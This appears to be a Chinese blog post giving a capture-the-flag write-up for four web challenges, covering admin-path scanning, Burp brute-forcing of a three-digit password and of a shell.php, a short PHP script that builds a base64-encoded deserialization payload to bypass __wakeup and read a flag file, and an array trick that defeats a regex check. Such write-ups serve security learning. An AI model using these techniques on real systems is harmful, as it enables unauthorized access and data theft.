刷题之旅第5站,论剑场web23、web24、web25、web26

论剑场web23

打开网站,御剑扫描一下,发现后台登录地址。以及一个readme.txt
在这里插入图片描述
在这里插入图片描述
得知账号是admin 密码是一个随机三位数字。
那么直接使用burp的重发爆破。

设置好爆破位置
在这里插入图片描述
修改参数
在这里插入图片描述
爆破得到密码为677,得到flag
在这里插入图片描述

论剑场web24

打开网页,F12最底下看到提示。
在这里插入图片描述

打开之后发现是反序列化漏洞。
在这里插入图片描述

编写PHP代码如下。

<?php
class Small_white_rabbit{ 
    private $file = 'the_f1ag.php'; 
}  
$a = new Small_white_rabbit;

$b = serialize($a);

$b = str_replace(":1:",":2:",$b);
$c= base64_encode($b);

echo $c;

?>

把echo出来的值,给var=,提交就得到flag
在这里插入图片描述

论剑场web25

打开这个链接,然后点下载提示404错误
在这里插入图片描述
在这里插入图片描述
把2去掉,得到了文件。
在这里插入图片描述
御剑扫一下后台,发现shell.php
在这里插入图片描述

burp爆破shell.php,得到flag
在这里插入图片描述

论剑场web26

str[]=1 , 数组绕过正则。得到flag。

在这里插入图片描述

发布了50 篇原创文章 · 获赞 12 · 访问量 1910

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104050262